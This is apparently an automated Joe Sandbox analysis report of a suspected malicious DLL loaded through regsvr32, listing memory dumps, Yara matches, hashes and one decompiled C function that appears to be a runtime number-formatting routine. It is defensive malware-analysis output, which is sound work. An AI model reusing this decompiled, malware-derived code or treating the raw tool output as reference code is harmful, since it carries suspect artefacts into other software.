                                                                              0x1001f2d4
                                                                              0x1001f2e1
                                                                              0x1001f2cb
                                                                              0x1001f2cb
                                                                              0x1001f2cb
                                                                              0x1001f2cb
                                                                              0x1001f2c9
                                                                              0x1001f2e9
                                                                              0x1001f2f1
                                                                              0x1001f30d
                                                                              0x1001f2f3
                                                                              0x1001f2f8
                                                                              0x00000000
                                                                              0x1001f302

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: IconicVisibleWindow
                                                                              • String ID:
                                                                              • API String ID: 1797901696-0
                                                                              • Opcode ID: 4b4e052b448e47cc18d7773706117ba410d7affc84a237e6a06365177470284a
                                                                              • Instruction ID: 080e033745362f31bd7b99acc1b8b205aeca61264d451d7c487c76ae9ced8492
                                                                              • Opcode Fuzzy Hash: 4b4e052b448e47cc18d7773706117ba410d7affc84a237e6a06365177470284a
                                                                              • Instruction Fuzzy Hash: 6FF0892970054043DB04EB268EC033C6292EBD9BE4F654235DD298B7A1EF74DCCA8201
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180020A34 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :C$kR[
                                                                              • API String ID: 0-2209222604
                                                                              • Opcode ID: 11a29c0ca78bb61b91ac56aed3bc2f39647a1b65c88feb917197daf0b3f95e80
                                                                              • Instruction ID: 7c9a6a6b3faeb9776e3b10aef600c10835f2b607fd00d40f7bdfdfd53dfcb9a1
                                                                              • Opcode Fuzzy Hash: 11a29c0ca78bb61b91ac56aed3bc2f39647a1b65c88feb917197daf0b3f95e80
                                                                              • Instruction Fuzzy Hash: 90D13870A4470C8FDB99DFA8D04A7DDBBF2FB48344F108119E80AAF295C7B49949CB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180022E38 Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Jl$aijA
                                                                              • API String ID: 0-1592139677
                                                                              • Opcode ID: 63e2519535c0a0a06864801ebef0b78a9df6d39fc0654acb9b8633e279544aec
                                                                              • Instruction ID: 7b4029e1b0f4c6d16455640de175402024ed69906be1bf35ac226dba8d49acae
                                                                              • Opcode Fuzzy Hash: 63e2519535c0a0a06864801ebef0b78a9df6d39fc0654acb9b8633e279544aec
                                                                              • Instruction Fuzzy Hash: 4AC1217111474CCFDBA9CF28C59A6DA3BE8FF48344F10412AFC5A86261C774EA58CB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000C85C Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: i6$5t
                                                                              • API String ID: 0-3127670231
                                                                              • Opcode ID: a253027af394429a069129eb83cd81c4fb0c40bb542b60a20d2aa22b5b78e39c
                                                                              • Instruction ID: 343c37a285082c0d22a0c6c838fe19bbba7b54ff6f1f952ba2714c32cb406723
                                                                              • Opcode Fuzzy Hash: a253027af394429a069129eb83cd81c4fb0c40bb542b60a20d2aa22b5b78e39c
                                                                              • Instruction Fuzzy Hash: B6A1E270D087188FDB69DFB9C88A69DBBF0FB48708F20821DD856A7252DB749949CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10045FC0 Relevance: 2.7, Strings: 2, Instructions: 218COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E10045FC0(signed int __ecx, long long __rbx, char* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r9, long long __r12, long long __r13, long long __r14, long long __r15, long long _a16, signed int _a32, intOrPtr* _a40, signed int _a48, long long _a56) {
				void* _v8;
				long long _v16;
				void* _v24;
				void* _v32;
				void* _v40;
				void* _v48;
				long long _v56;
				void* _v64;
				signed char _v80;
				long long _v88;
				void* _v104;
				long long _v120;
				intOrPtr _t92;
				void* _t95;
				signed int _t108;
				signed int _t117;
				signed int _t127;
				signed int _t131;
				void* _t139;
				void* _t141;
				long long _t152;
				intOrPtr* _t155;
				char* _t158;
				char* _t164;
				void* _t168;
				intOrPtr* _t170;
				char* _t173;
				long long _t177;
				void* _t178;
				intOrPtr* _t182;
				char* _t190;
				long long _t192;
				intOrPtr* _t193;
				signed long long _t196;

				_t192 = __r14;
				_t187 = __r12;
				_t177 = __rbp;
				_t175 = __rsi;
				_t163 = __rdx;
				_t117 = __ecx;
				_a32 = r9d;
				_a16 = __rdx;
				_t147 = _t182;
				 *((long long*)(_t147 - 8)) = __rbx;
				 *((long long*)(_t147 - 0x18)) = __rsi;
				 *((long long*)(_t147 - 0x20)) = __rdi;
				 *((long long*)(_t147 - 0x28)) = __r12;
				 *((long long*)(_t147 - 0x30)) = __r13;
				r12b = 0;
				_t190 = __rcx;
				_t155 = _a56;
				 *((long long*)(_t147 - 0x40)) = __r15;
				_t196 = r8d;
				 *((intOrPtr*)(_t147 - 0x50)) = r12b;
				_t183 = __rdx;
				if(_t155 != 0) {
					_t163 =  &_v104;
					 *_t163 =  *_t155;
					_t147 =  *((intOrPtr*)(_t155 + 8));
					 *((long long*)(_t163 + 8)) = _t147;
					_t170 = _v104;
					r12d = _v80 & 0x000000ff;
					_t152 = _v88;
					_a56 = _t170;
				} else {
					E1003D060(_t147, __rbx, _t155, __rdx, __rdi, __rsi, __rbp, __rdx, __r12);
					_t152 = _t147;
					_t170 =  *((intOrPtr*)(_t147 + 0xc0));
					_t175 =  *((intOrPtr*)(_t147 + 0xb8));
					_t139 = _t170 -  *0x100703d0; // 0x10070270
					_a56 = _t170;
					if(_t139 != 0) {
						_t122 =  *(_t147 + 0xc8);
						if(( *0x10070258 &  *(_t147 + 0xc8)) == 0) {
							E10047EE0(_t122, _t147, _t155, __rdx, __rdx, __r12);
							_t170 = _t147;
							_a56 = _t147;
						}
					}
					_t141 = _t175 -  *0x10070150; // 0x23a5c20
					if(_t141 != 0) {
						_t121 =  *(_t152 + 0xc8);
						if(( *0x10070258 &  *(_t152 + 0xc8)) == 0) {
							E10047300(_t121, _t147, _t152, _t155, _t163, _t170, _t175, _t177, _t187);
						}
					}
					_t117 =  *(_t152 + 0xc8);
					if((_t117 & 0x00000002) != 0) {
						_t183 = _a16;
					} else {
						_t183 = _a16;
						_t117 = _t117 | 0x00000002;
						r12b = 1;
						 *(_t152 + 0xc8) = _t117;
					}
				}
				if(_t190 != 0) {
					if(_t183 == 0) {
						goto L12;
					}
					_t94 =  >  ? r15d : 0;
					_t95 = ( >  ? r15d : 0) + 9;
					if(_t183 > _t147) {
						r9d = _a48 & 0x000000ff;
						_v16 = _t177;
						_v56 = _t192;
						_t193 = _a40;
						_t178 = 0xffffffff;
						if(r9b != 0) {
							r9d = 0;
							_t168 = _t175 + _t190;
							r9b = r15d > 0;
							if(r9d == 0) {
								r9b = _a48;
							} else {
								asm("repne scasb");
								_t147 = r9d + _t168;
								E1003AB00(_t117, r9d + _t168, _t168,  !0xffffffff);
								_t170 = _a56;
								_t183 = _a16;
								r9b = _a48;
							}
						}
						_t164 = _t190;
						if( *_t193 == 0x2d) {
							 *_t190 = 0x2d;
							_t164 = _t190 + 1;
						}
						if(r15d > 0) {
							_t108 =  *(_t164 + 1) & 0x000000ff;
							_t164 = _t164 + 1;
							 *(_t164 - 1) = _t108;
							_t147 =  *(_t170 + 0x128);
							 *_t164 =  *( *( *(_t170 + 0x128))) & 0x000000ff;
						}
						_t119 = _t117 & 0xffffff00 | r9b == 0x00000000;
						_t173 = _t164 + _t196 + _t175;
						if(_t183 != _t178) {
							_t178 = _t190 - _t173 + _t183;
						}
						_t184 = "e+000";
						_t165 = _t178;
						if(E10047020(_t147, _t152, _t173, _t178, _t173, _t175, _t178, "e+000") != 0) {
							r9d = 0;
							r8d = 0;
							_t119 = 0;
							_v120 = _t175;
							E1003C6F0(0, _t165, _t184);
						}
						_t158 = _t173 + 2;
						if(_a32 != 0) {
							 *_t173 = 0x45;
						}
						if( *((char*)( *((intOrPtr*)(_t193 + 0x10)))) != 0x30) {
							r8d =  *(_t193 + 4);
							r8d = r8d - 1;
							if(r8d < 0) {
								r8d =  ~r8d;
								 *((char*)(_t173 + 1)) = 0x2d;
							}
							if(r8d >= 0x64) {
								_t131 = (0x51eb851f * r8d >> 0x20 >> 5) + (0x51eb851f * r8d >> 0x20 >> 5 >> 0x1f);
								 *((intOrPtr*)(_t173 + 2)) =  *((intOrPtr*)(_t173 + 2)) + _t131;
								r8d = r8d + _t131 * 0xffffff9c;
							}
							if(r8d >= 0xa) {
								_t127 = (0x66666667 * r8d >> 0x20 >> 2) + (0x66666667 * r8d >> 0x20 >> 2 >> 0x1f);
								 *((intOrPtr*)(_t173 + 3)) =  *((intOrPtr*)(_t173 + 3)) + _t127;
								r8d = r8d + _t127 * 0xfffffff6;
							}
							 *((intOrPtr*)(_t173 + 4)) =  *((intOrPtr*)(_t173 + 4)) + r8b;
						}
						if(( *0x10075be0 & 0x00000001) != 0 &&  *_t158 == 0x30) {
							r8d = 3;
							E1003AB00(_t119, _t158, _t158 + 1, _t184);
						}
						if(r12b != 0) {
							 *(_t152 + 0xc8) =  *(_t152 + 0xc8) & 0xfffffffd;
						}
						_t92 = 0;
					} else {
						E1003AF40(_t147);
						r9d = 0;
						r8d = 0;
						_v120 = _t175;
						 *_t147 = 0x22;
						E1003C790(_t152, _t155, _t163, _t170, _t175, _t177, _t183);
						if(r12b != 0) {
							 *(_t152 + 0xc8) =  *(_t152 + 0xc8) & 0xfffffffd;
						}
						_t92 = 0x22;
					}
					goto L48;
				} else {
					L12:
					E1003AF40(_t147);
					r9d = 0;
					r8d = 0;
					 *_t147 = 0x16;
					_v120 = _t175;
					E1003C790(_t152, _t155, _t163, _t170, _t175, _t177, _t183);
					if(r12b != 0) {
						 *(_t152 + 0xc8) =  *(_t152 + 0xc8) & 0xfffffffd;
					}
					_t92 = 0x16;
					L48:
					return _t92;
				}
			}





































                                                                              0x10045fc0
                                                                              0x10045fc0
                                                                              0x10045fc0
                                                                              0x10045fc0
                                                                              0x10045fc0
                                                                              0x10045fc0
                                                                              0x10045fc0
                                                                              0x10045fc5
                                                                              0x10045fca
                                                                              0x10045fd4
                                                                              0x10045fd8
                                                                              0x10045fdc
                                                                              0x10045fe0
                                                                              0x10045fe4
                                                                              0x10045fe8
                                                                              0x10045feb
                                                                              0x10045fee
                                                                              0x10045ff6
                                                                              0x10045ffd
                                                                              0x10046000
                                                                              0x10046004
                                                                              0x10046007
                                                                              0x10046092
                                                                              0x10046097
                                                                              0x1004609a
                                                                              0x1004609e
                                                                              0x100460a2
                                                                              0x100460a7
                                                                              0x100460ad
                                                                              0x100460b2
                                                                              0x1004600d
                                                                              0x1004600d
                                                                              0x10046012
                                                                              0x10046015
                                                                              0x1004601c
                                                                              0x10046023
                                                                              0x1004602a
                                                                              0x10046032
                                                                              0x10046034
                                                                              0x10046040
                                                                              0x10046042
                                                                              0x10046047
                                                                              0x1004604a
                                                                              0x1004604a
                                                                              0x10046040
                                                                              0x10046052
                                                                              0x10046059
                                                                              0x1004605b
                                                                              0x10046067
                                                                              0x10046069
                                                                              0x10046069
                                                                              0x10046067
                                                                              0x1004606e
                                                                              0x10046077
                                                                              0x100460bc
                                                                              0x10046079
                                                                              0x10046079
                                                                              0x10046081
                                                                              0x10046084
                                                                              0x10046087
                                                                              0x10046087
                                                                              0x10046077
                                                                              0x100460c7
                                                                              0x10046103
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004610c
                                                                              0x10046110
                                                                              0x10046118
                                                                              0x1004614f
                                                                              0x10046158
                                                                              0x10046160
                                                                              0x10046168
                                                                              0x10046170
                                                                              0x10046177
                                                                              0x10046180
                                                                              0x10046186
                                                                              0x1004618c
                                                                              0x10046193
                                                                              0x100461cd
                                                                              0x10046195
                                                                              0x1004619d
                                                                              0x100461a5
                                                                              0x100461ae
                                                                              0x100461b3
                                                                              0x100461bb
                                                                              0x100461c3
                                                                              0x100461c3
                                                                              0x10046193
                                                                              0x100461d9
                                                                              0x100461dc
                                                                              0x100461de
                                                                              0x100461e3
                                                                              0x100461e3
                                                                              0x100461ea
                                                                              0x100461ec
                                                                              0x100461f0
                                                                              0x100461f4
                                                                              0x100461f7
                                                                              0x10046204
                                                                              0x10046204
                                                                              0x10046210
                                                                              0x10046213
                                                                              0x10046219
                                                                              0x10046221
                                                                              0x10046221
                                                                              0x10046224
                                                                              0x1004622b
                                                                              0x10046240
                                                                              0x10046242
                                                                              0x10046245
                                                                              0x1004624a
                                                                              0x1004624c
                                                                              0x10046251
                                                                              0x10046251
                                                                              0x1004625d
                                                                              0x10046261
                                                                              0x10046263
                                                                              0x10046263
                                                                              0x1004626d
                                                                              0x1004626f
                                                                              0x10046273
                                                                              0x10046277
                                                                              0x10046279
                                                                              0x1004627c
                                                                              0x1004627c
                                                                              0x10046284
                                                                              0x10046296
                                                                              0x10046298
                                                                              0x1004629e
                                                                              0x1004629e
                                                                              0x100462a5
                                                                              0x100462b7
                                                                              0x100462b9
                                                                              0x100462bf
                                                                              0x100462bf
                                                                              0x100462c2
                                                                              0x100462c2
                                                                              0x100462d2
                                                                              0x100462dd
                                                                              0x100462e3
                                                                              0x100462e3
                                                                              0x100462eb
                                                                              0x100462ed
                                                                              0x100462ed
                                                                              0x100462f4
                                                                              0x1004611a
                                                                              0x1004611a
                                                                              0x1004611f
                                                                              0x10046122
                                                                              0x10046129
                                                                              0x1004612e
                                                                              0x10046134
                                                                              0x1004613c
                                                                              0x1004613e
                                                                              0x1004613e
                                                                              0x10046145
                                                                              0x10046145
                                                                              0x00000000
                                                                              0x100460c9
                                                                              0x100460c9
                                                                              0x100460c9
                                                                              0x100460d0
                                                                              0x100460d3
                                                                              0x100460da
                                                                              0x100460e0
                                                                              0x100460e5
                                                                              0x100460ed
                                                                              0x100460ef
                                                                              0x100460ef
                                                                              0x100460f6
                                                                              0x100462f6
                                                                              0x10046321
                                                                              0x10046321

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue$CurrentThread
                                                                              • String ID: e+000$gfff
                                                                              • API String ID: 526964173-3030954782
                                                                              • Opcode ID: 58ede124247bd277ec58773d2b3425e3822694113d1c0c193af8d224842a14ef
                                                                              • Instruction ID: f924935692c02a17ada6644c3403b41a6726d3a2f6616fedc29b1b9f80d99664
                                                                              • Opcode Fuzzy Hash: 58ede124247bd277ec58773d2b3425e3822694113d1c0c193af8d224842a14ef
                                                                              • Instruction Fuzzy Hash: 29912276705BC0C6D365CB65A90074E7BA1F388BC0F288225DF8887B4AEF79D450CB05
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002868C Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: t3Z$r'
                                                                              • API String ID: 0-3247238830
                                                                              • Opcode ID: 45187aede304d4735527529db4b0bfe1669f1d2749ba8206633b0fe433a295e4
                                                                              • Instruction ID: 1d29c97d450220819c0ed5b60dd6ff5608267f61915941bb22285759947d3464
                                                                              • Opcode Fuzzy Hash: 45187aede304d4735527529db4b0bfe1669f1d2749ba8206633b0fe433a295e4
                                                                              • Instruction Fuzzy Hash: 74A1EC706057CC9FEBB9DF24C8897DE7BA0FB4A344F50461DE88A8E260DB745649CB02
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800180D4 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: N}V$jt
                                                                              • API String ID: 0-2926509837
                                                                              • Opcode ID: b049d5321a5d0b8b2c35b06077383899f8fb99c1ca51b799598ed477ff688beb
                                                                              • Instruction ID: 5d852b2b0b88ea82dc6b1cd0fb1e099f39aebf29041bab94b5a0a50aabd496dc
                                                                              • Opcode Fuzzy Hash: b049d5321a5d0b8b2c35b06077383899f8fb99c1ca51b799598ed477ff688beb
                                                                              • Instruction Fuzzy Hash: 64A148B990628CDFCB98DFA8C5CA58D7BB1FF44308F00411AFC169A256D7B4D629CB49
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000B618 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: |I$}r/
                                                                              • API String ID: 0-4123960085
                                                                              • Opcode ID: a5b20f145e2128ebb590cd3c49dff006a35873bd4209483889af058205fdcd1a
                                                                              • Instruction ID: 800e601dd46cbb9d9738628f52141beaff35432bc8d4d1bcfb76f59376750d80
                                                                              • Opcode Fuzzy Hash: a5b20f145e2128ebb590cd3c49dff006a35873bd4209483889af058205fdcd1a
                                                                              • Instruction Fuzzy Hash: 2981F2711047888BDBB9CF28C88A7DA7BA1FB95348F50C219D88ECE261DF75564DDB01
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000E06C Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Dm"i$e
                                                                              • API String ID: 0-579088429
                                                                              • Opcode ID: 1da592fe1c5b87024080557b40311a255aea64fd983cac56dc8e0bfd413ff1a3
                                                                              • Instruction ID: ff289f4c4decf21b808411560f97a6ae0bbfde48fa9fd21a36285b9362365cbb
                                                                              • Opcode Fuzzy Hash: 1da592fe1c5b87024080557b40311a255aea64fd983cac56dc8e0bfd413ff1a3
                                                                              • Instruction Fuzzy Hash: 1251A1B180038ECFCF88CF68D8865CE7BB0FF58358F105A19E865A6260D3B49664CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180016088 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: . 9$j~F
                                                                              • API String ID: 0-3982525500
                                                                              • Opcode ID: 8e27ed3e49b3a332b1e9bdfaf9f41fe9f17daf01a485ce033b7626c7aaf20959
                                                                              • Instruction ID: 73f587e096f547b5323f36eeea6c902c11c99e62676f2e49b342c8d806439c0b
                                                                              • Opcode Fuzzy Hash: 8e27ed3e49b3a332b1e9bdfaf9f41fe9f17daf01a485ce033b7626c7aaf20959
                                                                              • Instruction Fuzzy Hash: C951E3B190034A8FCF48CF68C5864EE7FB1FB58398F50461DE85AAA250D37896A4CFC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018001CABC Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <>$u_"
                                                                              • API String ID: 0-3712044913
                                                                              • Opcode ID: 54a7279f070d6e0e1cb936a4c41fbfa7e6deebc7b08f576cf545ddb7c45c5dbd
                                                                              • Instruction ID: 00705162336351badf1f89c020232bf89398a1e9550ad3a4c6adce9a79b90856
                                                                              • Opcode Fuzzy Hash: 54a7279f070d6e0e1cb936a4c41fbfa7e6deebc7b08f576cf545ddb7c45c5dbd
                                                                              • Instruction Fuzzy Hash: FC51BFB090034E8FCB48CF69D48A5DE7FB1FB58398F104619E856AA250D37496A8CBC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180011CCC Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Wm$`W
                                                                              • API String ID: 0-829970788
                                                                              • Opcode ID: 1814abb82c64624d0c82e6b0c2fd8fef1d44b2e07111184ee76eb17802e65ade
                                                                              • Instruction ID: 3e5335a01fca1db20c73b4a4a46b2fe43dbf21032e81bd0b2231691c24575172
                                                                              • Opcode Fuzzy Hash: 1814abb82c64624d0c82e6b0c2fd8fef1d44b2e07111184ee76eb17802e65ade
                                                                              • Instruction Fuzzy Hash: F041C070D1461C8FCF48DFA9D886ADDBBB0FB48304F20821DE456B6260C7789948CF69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180029C6C Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NKi$gJk
                                                                              • API String ID: 0-746334108
                                                                              • Opcode ID: 58a5bce911c0f09ef1344d541f8e13db5683852ad3f58203c0096be295061b76
                                                                              • Instruction ID: 370847f9a3576a2127be3913012de96f7d2fcf003f6ba5f8aec55f91b5c1372d
                                                                              • Opcode Fuzzy Hash: 58a5bce911c0f09ef1344d541f8e13db5683852ad3f58203c0096be295061b76
                                                                              • Instruction Fuzzy Hash: AD41C3B091034A8FCB48CF68C48A5DE7FF0FB28398F104619E815A6250D37496A8CFD5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000FC8C Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 97"$lND
                                                                              • API String ID: 0-255837067
                                                                              • Opcode ID: 9f2144797edb960c4800540d43b86211ccc900e5f41a7482899803b998be048c
                                                                              • Instruction ID: fdd228a39bc21f447827aa5875072745b1c1c90cd936de3499e4094daaa9051d
                                                                              • Opcode Fuzzy Hash: 9f2144797edb960c4800540d43b86211ccc900e5f41a7482899803b998be048c
                                                                              • Instruction Fuzzy Hash: 2F41D4B080038E8FCB48CFA8D8865DE7BF0FB48358F504609E86AA6250D7B49665CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800083F8 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: &Z];$j,
                                                                              • API String ID: 0-1323350831
                                                                              • Opcode ID: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                                                              • Instruction ID: 4d52acf51d445db6beda3a26974f1176594abf5478927dcbf805cd9d8e8fa18c
                                                                              • Opcode Fuzzy Hash: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                                                              • Instruction Fuzzy Hash: 9F31DEB190074E8BCF48DF24C88A1DE3BA1FB28798F50461DFC5696250D7B4D6A4CBC4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180026C80 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 'd=$Y6C
                                                                              • API String ID: 0-2002142494
                                                                              • Opcode ID: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                                                              • Instruction ID: ccf6aaa63b1aa8c6b30d000549e8006a3e599278b8e3fc9790a4e3cb01e02506
                                                                              • Opcode Fuzzy Hash: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                                                              • Instruction Fuzzy Hash: 744191B190034E9FCB44CFA8D48A5DEBFF0FB58398F205619E81AA6250D3B49694CFD5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

